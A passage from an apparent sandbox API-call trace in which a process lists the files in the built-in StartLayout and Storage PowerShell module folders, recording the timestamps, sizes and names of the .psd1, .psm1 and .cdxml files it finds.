ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0177.928] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 0 [0177.928] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.929] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0177.929] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0177.929] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592970 [0177.929] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.929] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0177.929] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0177.930] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.930] FindClose (in: hFindFile=0x1a592970 | out: hFindFile=0x1a592970) returned 1 [0177.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.930] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0177.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.930] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.930] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0177.930] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0177.930] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.931] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.931] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0177.931] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0177.931] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 0 [0177.931] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.931] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout\\startlayout.psd1")) returned 0x20 [0177.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.934] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0177.934] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", lpFilePart=0x0) returned 0x3b [0177.934] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.936] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.936] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disk.cdxml", cAlternateFileName="")) returned 1 [0177.936] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1672, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiskImage.cdxml", cAlternateFileName="")) returned 1 [0177.936] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileIntegrity.cdxml", cAlternateFileName="")) returned 1 [0177.936] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21df, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileServer.cdxml", cAlternateFileName="")) returned 1 [0177.937] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileShare.cdxml", cAlternateFileName="")) returned 1 [0177.937] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileStorageTier.cdxml", cAlternateFileName="")) returned 1 [0177.937] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorId.cdxml", cAlternateFileName="")) returned 1 [0177.937] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorPort.cdxml", cAlternateFileName="")) returned 1 [0177.937] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5af4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MaskingSet.cdxml", cAlternateFileName="")) returned 1 [0177.938] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OffloadDataTransferSetting.cdxml", cAlternateFileName="")) returned 1 [0177.938] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Partition.cdxml", cAlternateFileName="")) returned 1 [0177.938] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhysicalDisk.cdxml", cAlternateFileName="")) returned 1 [0177.938] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ResiliencySetting.cdxml", cAlternateFileName="")) returned 1 [0177.938] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfb55, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.format.ps1xml", cAlternateFileName="")) returned 1 [0177.939] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.psd1", cAlternateFileName="")) returned 1 [0177.939] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b0d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.types.ps1xml", cAlternateFileName="")) returned 1 [0177.939] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2591b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageCmdlets.cdxml", cAlternateFileName="")) returned 1 [0177.939] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageEnclosure.cdxml", cAlternateFileName="")) returned 1 [0177.939] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageHealth.cdxml", cAlternateFileName="")) returned 1 [0177.940] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x204c, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageJob.cdxml", cAlternateFileName="")) returned 1 [0177.941] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageNode.cdxml", cAlternateFileName="")) returned 1 [0177.941] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x800a, dwReserved0=0x0, dwReserved1=0x0, cFileName="StoragePool.cdxml", cAlternateFileName="")) returned 1 [0177.941] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageProvider.cdxml", cAlternateFileName="")) returned 1 [0177.942] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x331, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageReliabilityCounter.cdxml", cAlternateFileName="")) returned 1 [0177.942] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7853, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageScripts.psm1", cAlternateFileName="")) returned 1 [0177.942] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xba0, dwReserved0=0x0, 